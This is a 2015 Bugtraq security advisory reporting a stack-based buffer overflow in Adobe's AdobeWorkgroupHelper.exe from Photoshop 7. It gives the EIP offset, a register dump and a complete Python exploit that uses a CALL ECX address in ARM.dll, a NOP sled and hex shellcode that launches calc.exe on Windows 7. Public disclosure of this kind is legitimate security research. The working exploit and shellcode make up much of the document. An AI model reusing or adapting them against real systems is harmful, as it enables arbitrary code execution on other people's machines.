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Date: Tue, 13 Oct 2015 01:00:30 GMT
From: apparitionsec@...il.com
To: bugtraq@...urityfocus.com
Subject: AdobeWorkgroupHelper Stack Based Buffer Overflow

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt



Vendor:
================================
www.adobe.com



Product:
=================================
AdobeWorkgroupHelper.exe v2.8.3.3 
Part of Photoshop 7.0 circa 2002



Vulnerability Type:
===========================
Stack Based Buffer Overflow



CVE Reference:
==============
N/A




Vulnerability Details:
=====================

AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup functionality, that lets users work with files on a server that is registered as a workgroup.
If AdobeWorkgroupHelper.exe is called with an overly long command line argument it is vulnerable to a stack based buffer overflow exploit. 

Resluting in arbitrary code execution undermining the integrity of the program. We can control EIP register at about 5,856 bytes, our shellcode will point
to ECX register.

Tested successfully on Windows 7 SP1



Exploit code(s):
===============

Use below python script to exploit...


import struct,os,subprocess

#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
#Tested Windows 7 SP1
#------------------------------------
#by hyp3rlinx - apparitionsec@...il.com
#hyp3rlinx.altervista.org
#==============================================================
#
#0x618b19f7 : call ecx |  {PAGE_EXECUTE_READ} [ARM.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
#===============================================================

'''
Quick Register dump...

EAX 00270938
ECX 00270A7C                     <---------------BOOM!
EDX 00A515FC ASCII "AAAAAA..."
EBX 41414140
ESP 0018FEB0
EBP 0018FED0
ESI 00000000
EDI 41414141
EIP 004585C8 AdobeWor.004585C8
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)

'''


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\Program Files (x86)\Common Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "

#payload="A"*5852+"R"*4  #<---- control EIP register

#our shellcode will point at ECX register, so we need to find an JMP or CALL ECX and point EIP to that address
#where our malicious code resides, we find it in ARM.dll

eip=struct.pack('<L', 0x618B19F7)    #CALL ECX ARM.dll v2.8.3.3
payload="A"*5852+eip+"\x90"*20+sc    #<----- direct EIP overwrite BOOOOOM!!!

subprocess.Popen([vulnpgm, payload], shell=False)



Disclosure Timeline:
=========================================================
Vendor Notification: August 31, 2015
October 12, 2015  : Public Disclosure




Exploitation Technique:
=======================
Local



Severity Level:
=========================================================
Med



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx

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